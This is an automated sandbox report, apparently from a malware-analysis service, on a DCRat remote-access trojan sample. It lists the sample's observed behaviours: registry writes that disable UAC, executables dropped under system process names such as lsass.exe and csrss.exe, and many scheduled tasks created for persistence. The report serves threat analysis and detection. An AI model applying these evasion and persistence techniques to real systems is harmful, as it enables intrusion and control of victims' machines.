Malware Analysis Report

2024-10-10 12:53

Sample ID 240531-yhsctsba7t
Target 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8
SHA256 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8
Tags rat dcrat evasion execution infostealer trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score 10/10

SHA256 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8

Threat Level: Known bad

The file 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8 was found to be: Known bad.

Malicious Activity Summary

rat dcrat evasion execution infostealer trojan

DCRat payload

UAC bypass

Process spawned unexpected child process

DcRat

Dcrat family

DCRat payload

Detects executables packed with SmartAssembly

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Checks whether UAC is enabled

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Modifies registry class

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

System policy modification

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-05-31 19:47

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-05-31 19:47
Reported 2024-05-31 19:50
Platform win7-20240221-en
Max time kernel 149s
Max time network 149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables packed with SmartAssembly

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\RCX3E2C.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Windows Journal\it-IT\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Internet Explorer\SIGNUP\27d1bcfc3c54e0 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\42af1c969fbb7b C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office14\1033\RCX3079.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\RCX3715.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\RCX4A47.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Microsoft Office\Office14\1033\wininit.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX2C50.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX2C51.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\RCX3E2B.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\RCX40AD.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\RCX4A46.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Windows Journal\it-IT\csrss.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Journal\it-IT\RCX3918.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\SIGNUP\RCX3BAA.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Windows Mail\fr-FR\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Windows Mail\fr-FR\27d1bcfc3c54e0 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Journal\it-IT\csrss.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office14\1033\RCX307A.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office14\1033\wininit.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\RCX40AE.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\RCX517D.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\69ddcba757bf72 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\27d1bcfc3c54e0 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Journal\it-IT\RCX3987.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\SIGNUP\RCX3BAB.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\RCX517E.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\101b941d020240 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Microsoft Office\Office14\1033\56085415360792 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Windows Media Player\fr-FR\397cb10b2d4e0e C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\RCX3714.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SoftwareDistribution\DataStore\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Windows\SoftwareDistribution\DataStore\27d1bcfc3c54e0 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\RCX45C0.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\RCX45C1.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
